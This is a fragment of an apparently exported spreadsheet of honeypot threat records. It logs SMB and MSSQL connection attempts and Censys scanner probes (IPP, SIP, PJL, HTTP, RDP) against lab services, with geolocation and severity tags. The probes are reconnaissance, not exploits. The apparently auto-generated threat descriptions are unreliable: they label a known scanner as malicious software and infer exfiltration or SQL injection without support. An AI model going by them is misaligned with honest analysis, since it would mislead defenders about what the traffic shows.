    <s v="Kota Administrasi Jakarta Selatan"/>
    <s v="Jakarta"/>
    <s v="1642911"/>
    <s v="NA"/>
    <s v="-6.22911"/>
    <s v="106.813"/>
    <s v="17995"/>
    <s v="PT iForte Global Internet"/>
    <s v="PT iForte Global Internet"/>
    <s v="business"/>
    <s v="PT Adhi Karya Nusa"/>
    <s v="2021-04-23"/>
    <s v="IDNIC-ADHIKN-ID"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.166.136.65,58542)}&amp;&amp;{Data_SMB:Incoming connection (103.166.136.65,8713)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.166.136.65,61491)}&amp;&amp;{Data_SMB:Incoming connection (103.166.136.65,62211)}&amp;&amp;{Data_SMB:Incoming connection (103.166.136.65,56947)}&amp;&amp;{Data_SMB:Incoming connection (103.166.136.65,8194)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.166.136.65,51130)}&amp;&amp;{Data_SMB:Incoming connection (103.166.136.65,52078)}&amp;&amp;{Data_SMB:Incoming connection (103.166.136.65,52213)}&amp;&amp;{Data_SMB:Incoming connection (103.166.136.65,53415)}&amp;&amp;{Data_SMB:Incoming connection (103.166.136.65,49419)}&amp;&amp;{Data_SMB:Incoming connection (103.166.136.65,50582)}&amp;&amp;{Data_SMB:Incoming connection (103.166.136.65,59201)}&amp;&amp;{Data_SMB:Incoming connection (103.166.136.65,59568)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.166.136.65,55193)}&amp;&amp;{Data_SMB:Incoming connection (103.166.136.65,55880)}&amp;&amp;{Data_SMB:Incoming connection (103.166.136.65,34504)}&amp;&amp;{Data_SMB:Incoming connection (103.166.136.65,1938)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.166.136.65,53035)}&amp;&amp;{Data_SMB:Incoming connection (103.166.136.65,53856)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.166.136.65,65369)}&amp;&amp;{Data_SMB:Incoming connection (103.166.136.65,49474)}&amp;&amp;{Data_SMB:Incoming connection (103.166.136.65,65453)}&amp;&amp;{Data_SMB:Incoming connection (103.166.136.65,49854)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:67a6:8841"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="medium&amp;&amp;low"/>
    <s v="Low"/>
    <s v="A suspicious incoming SMB connection has been detected from IP address 103.166.136.65 on an unknown port 65453. This could be a malicious attempt to access or exploit the system's file sharing services. Further investigation is needed to determine the nature of this activity. &amp;&amp; Possible malicious activity detected - incoming SMB connection from a suspicious IP address attempting to establish unauthorized access to system resources. This may indicate an attempt at file sharing or data theft. Further investigation is needed to determine the intent behind this action. &amp;&amp; A possible malicious activity is an unknown remote client attempting to initiate a connection to a service on the system. This could be indicative of a potential scanning or probing attempt. The IP address 103.166.136.65 may be involved in unauthorized access attempts. &amp;&amp; An incoming SMB connection from an IP address is detected, potentially indicating a malicious attempt to access or exploit a shared resource on the system. This could be a reconnaissance activity or a prelude to further attacks. The suspicious IP address may be attempting to establish unauthorized access."/>
    <s v="SMB Scanning &amp;&amp; SMB Attack &amp;&amp; SMB Scan &amp;&amp; SMB Brute"/>
  </r>
  <r>
    <x v="178"/>
    <x v="178"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T11:56:13"/>
    <d v="2025-04-30T11:55:08"/>
    <d v="2025-04-30T11:56:13"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bidar"/>
    <s v="Homnābād"/>
    <s v="1269979"/>
    <s v="NA"/>
    <s v="17.7707"/>
    <s v="77.1252"/>
    <s v="24560"/>
    <s v="Bharti Airtel Limited"/>
    <s v="BHARTI"/>
    <s v="residential"/>
    <s v="ABTS (Karnataka)"/>
    <s v="2006-12-19"/>
    <s v="ABTS-KK-DSL-9102-blr"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7aab:1616"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="179"/>
    <x v="179"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T11:51:39"/>
    <d v="2024-03-19T08:04:19"/>
    <d v="2025-04-30T11:51:39"/>
    <n v="731"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;SIP Endpoint Enumeration&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Encryption Misuse&amp;&amp;Email Spoofing"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_IMAP_H9&amp;&amp;SMA-LAB_POSTGRES_H47&amp;&amp;SMA-LAB_POSTGRES_H45&amp;&amp;SMA-LAB_ORACLE_H34&amp;&amp;SMA-LAB_IPP_H8&amp;&amp;SMA-LAB_MSSQL_H11&amp;&amp;SMA-LAB_REDIS_H45&amp;&amp;SMA-LAB_SOCKS5_H39&amp;&amp;SMA-LAB_LDAP_H12&amp;&amp;SMA-LAB_POP3_H14&amp;&amp;SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_HTTP_H2&amp;&amp;SMA-LAB_RDP_H39&amp;&amp;SMA-LAB_IRC_H5&amp;&amp;SMA-LAB_SOCKS5_H14&amp;&amp;SMA-LAB_POSTGRES_H5&amp;&amp;SMA-LAB_SMTP_H3&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_IRC_H33&amp;&amp;SMA-LAB_ORACLE_H35&amp;&amp;SMA-LAB_MYSQL_H35&amp;&amp;SMA-LAB_ORACLE_H38&amp;&amp;SMA-LAB_MYSQL_H18&amp;&amp;SMA-LAB_FTP_H28&amp;&amp;SMA-LAB_POSTGRES_H11&amp;&amp;SMA-LAB_POP3_H38&amp;&amp;SMA-LAB_LDAP_H15&amp;&amp;SMA-LAB_SOCKS5_H36&amp;&amp;SMA-LAB_MT-CPA_H44&amp;&amp;SMA-LAB_SMB_H37&amp;&amp;SMA-LAB_IRC_H41&amp;&amp;SMA-LAB_HTTPS_H6&amp;&amp;SMA-LAB_LDAP_HC1&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_VNC_H12&amp;&amp;SMA-LAB_POP3_H21&amp;&amp;SMA-LAB_SOCKS5_H41&amp;&amp;SMA-LAB_SMTP_H45&amp;&amp;SMA-LAB_POP3_H39&amp;&amp;SMA-LAB_IMAP_H16&amp;&amp;SMA-LAB_SIP_H47&amp;&amp;SMA-LAB_LDAP_H33&amp;&amp;SMA-LAB_IMAP_H8&amp;&amp;SMA-LAB_POSTGRES_H21&amp;&amp;SMA-LAB_POSTGRES_H38&amp;&amp;SMA-LAB_MYSQL_H23&amp;&amp;SMA-LAB_SOCKS5_H21&amp;&amp;SMA-LAB_IMAP_H12&amp;&amp;SMA-LAB_IPP_H3&amp;&amp;SMA-LAB_POSTGRES_H12&amp;&amp;SMA-LAB_MYSQL_H15&amp;&amp;SMA-LAB_FTP_H36&amp;&amp;SMA-LAB_MSSQL_H24&amp;&amp;SMA-LAB_POP3_H18&amp;&amp;SMA-LAB_FTP_H31&amp;&amp;SMA-LAB_SMB_H16&amp;&amp;SMA-LAB_FTP_H12&amp;&amp;SMA-LAB_HTTPS_H29&amp;&amp;SMA-LAB_HTTPS_H30&amp;&amp;SMA-LAB_SIP_H36&amp;&amp;SMA-LAB_POSTGRES_H18&amp;&amp;SMA-LAB_HTTPS_H41&amp;&amp;SMA-LAB_RDP_H44&amp;&amp;SMA-LAB_POP3_H32&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_RDP_H8&amp;&amp;SMA-LAB_RDP_H35&amp;&amp;SMA-LAB_POP3_H6&amp;&amp;SMA-LAB_SIP_H27&amp;&amp;SMA-LAB_SMTP_H5&amp;&amp;SMA-LAB_LDAP_H16&amp;&amp;SMA-LAB_PJL_H3&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_IRC_H24&amp;&amp;SMA-LAB_RDP_H26&amp;&amp;SMA-LAB_ORACLE_H15&amp;&amp;SMA-LAB_FTP_H15&amp;&amp;SMA-LAB_LDAP_H27&amp;&amp;SMA-LAB_POP3_H31&amp;&amp;SMA-LAB_MYSQL_H26&amp;&amp;SMA-LAB_ORACLE_H2&amp;&amp;SMA-LAB_HTTPS_H12&amp;&amp;SMA-LAB_SIP_H26&amp;&amp;SMA-LAB_ORACLE_H31&amp;&amp;SMA-LAB_IRC_H8&amp;&amp;SMA-LAB_SIP_H8&amp;&amp;SMA-LAB_SOCKS5_H34&amp;&amp;SMA-LAB_MYSQL_H6&amp;&amp;SMA-LAB_IMAP_H46&amp;&amp;SMA-LAB_SMTP_H23&amp;&amp;SMA-LAB_PJL_HC1&amp;&amp;SMA-LAB_POSTGRES_H40&amp;&amp;SMA-LAB_IMAP_H44&amp;&amp;SMA-LAB_SIP_H18&amp;&amp;SMA-LAB_POSTGRES_H23&amp;&amp;SMA-LAB_IRC_H35&amp;&amp;SMA-LAB_SIP_H45&amp;&amp;SMA-LAB_REDIS_H37&amp;&amp;SMA-LAB_REDIS_H6&amp;&amp;SMA-LAB_MYSQL_H39&amp;&amp;SMA-LAB_REDIS_H33&amp;&amp;SMA-LAB_IPP_H35&amp;&amp;SMA-LAB_IRC_HC1&amp;&amp;SMA-LAB_FTP_H35&amp;&amp;SMA-LAB_RDP_H42&amp;&amp;SMA-LAB_IRC_H37&amp;&amp;SMA-LAB_IMAP_H5&amp;&amp;SMA-LAB_LDAP_H10&amp;&amp;SMA-LAB_SIP_H10&amp;&amp;SMA-LAB_POSTGRES_H36&amp;&amp;SMA-LAB_HTTPS_H17&amp;&amp;SMA-LAB_POSTGRES_H46&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_SMB_H27&amp;&amp;SMA-LAB_LDAP_H20&amp;&amp;SMA-LAB_VNC_H17&amp;&amp;SMA-LAB_MYSQL_H31&amp;&amp;SMA-LAB_IRC_H36&amp;&amp;SMA-LAB_SOCKS5_H6&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_MSSQL_H8&amp;&amp;SMA-LAB_POP3_H9"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;143&amp;&amp;5432&amp;&amp;1521&amp;&amp;631&amp;&amp;1433&amp;&amp;6379&amp;&amp;1080&amp;&amp;389&amp;&amp;110&amp;&amp;3389&amp;&amp;6667&amp;&amp;25&amp;&amp;3306&amp;&amp;21917&amp;&amp;445&amp;&amp;443&amp;&amp;5900&amp;&amp;NA&amp;&amp;59550&amp;&amp;59564&amp;&amp;9100&amp;&amp;80&amp;&amp;58350&amp;&amp;58340&amp;&amp;21&amp;&amp;58552&amp;&amp;58560&amp;&amp;58428&amp;&amp;58422&amp;&amp;41334&amp;&amp;41320&amp;&amp;41314&amp;&amp;48240&amp;&amp;35536&amp;&amp;36950&amp;&amp;39534&amp;&amp;47538"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'dnsbl-2.uceprotect.net': ['unknown']&amp;&amp; 'dnsbl-3.uceprotect.net': ['unknown']&amp;&amp; 'ips.backscatterer.org': ['unknown']&amp;&amp; 'spamrbl.imp.ch': ['unknown']}"/>
    <n v="179"/>
    <s v="True"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="MI"/>
    <s v="Michigan"/>
    <s v="Washtenaw"/>
    <s v="Ann Arbor (Old West Side)"/>
    <s v="4984247"/>
    <s v="48104"/>
    <s v="42.2809"/>
    <s v="-83.7489"/>
    <s v="398324"/>
    <s v="Censys, Inc."/>
    <s v="Censys, Inc."/>
    <s v="hosting"/>
    <s v="Censys Inc"/>
    <s v="2020-06-12"/>
    <s v="CENSY"/>
    <s v="2024-03-29"/>
    <s v="connection&amp;&amp;command&amp;&amp;login&amp;&amp;GET&amp;&amp;NA&amp;&amp;request&amp;&amp;query&amp;&amp;stshash"/>
    <s v="NA&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'STLS'}}&amp;&amp;{Data_ORACLE:{'local_user': 'None', 'program': 'zgrab2', 'service_name': 'None'}}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '146', 'Content-Type': 'application/ipp', 'Host': '95.164.118.29:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '144.126.148.5', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'STARTTLS', 'data': 'None'}}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=162.142.125.47;rport=57516'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '146', 'Content-Type': 'application/ipp', 'Host': '94.131.118.77:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://94.131.118.77:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 194.146.12.172:9100_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=162.142.125.47;rport=54896'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=162.142.125.47;rport=39691'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 194.4.48.242:9100_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=162.142.125.47;rport=48658'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '144.126.148.5', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_SMB:Incoming connection (162.142.125.47,46012)}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '145', 'Content-Type': 'application/ipp', 'Host': '94.131.97.67:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://94.131.97.67:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000d__x000a_'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '145', 'Content-Type': 'application/ipp', 'Host': '5.253.43.207:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://5.253.43.207:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=162.142.125.47;rport=45437'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=162.142.125.47;rport=53607'}}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash='}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '146', 'Content-Type': 'application/ipp', 'Host': '38.54.116.162:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://38.54.116.162:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=162.142.125.47;rport=54535'}}&amp;&amp;{Data_HTTPS:{'Host': '38.54.117.64:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.54.117.64', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.54.117.64', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '145', 'Content-Type': 'application/ipp', 'Host': '194.4.48.242:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://194.4.48.242:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_IRC:{'command': '*IDN?', 'params': '[]', 'prefix': ''}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.54.79.122', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.54.79.122', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '146', 'Content-Type': 'application/ipp', 'Host': '156.244.37.11:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://156.244.37.11:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=162.142.125.47;rport=50513'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=162.142.125.47;rport=58154'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 156.244.8.69:9100_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 94.131.113.33:9100_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'l x0b         '}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '144', 'Content-Type': 'application/ipp', 'Host': '38.60.209.6:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '147', 'Content-Type': 'application/ipp', 'Host': '194.233.76.135:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://194.233.76.135:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=162.142.125.47;rport=58239'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://38.60.209.6:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_HTTPS:{'Host': '38.60.171.39:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.171.39', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.60.171.39', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '146', 'Content-Type': 'application/ipp', 'Host': '38.60.224.106:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '5.182.38.84', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '5.182.38.84', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000d__x000a_'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '147', 'Content-Type': 'application/ipp', 'Host': '193.57.138.110:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:a28e:7d2f"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low&amp;&amp;High&amp;&amp;Medium"/>
    <s v="There is no log data provided for analysis. &amp;&amp; A POST request is sent from IP address 5.253.43.207 to a server that appears to be an IPP printer service, with potentially malicious software (CensysInspect) attempting to scan or exploit the service. The large content length of 145 suggests a potential file transfer or data exfiltration attempt. This could indicate reconnaissance or exploitation activity. &amp;&amp; Possible attempted SQL injection or unauthorized database access attempt, as the presence of &quot;POSTGRES&quot; suggests a targeted attack on a PostgreSQL database. &amp;&amp; This log indicates an attempt to access a sensitive area of the system, suggesting a potential unauthorized probing or reconnaissance activity._x000a_A malicious actor may be trying to gather information about the system's configuration and security settings._x000a_Further investigation is needed to determine the intent behind this action. 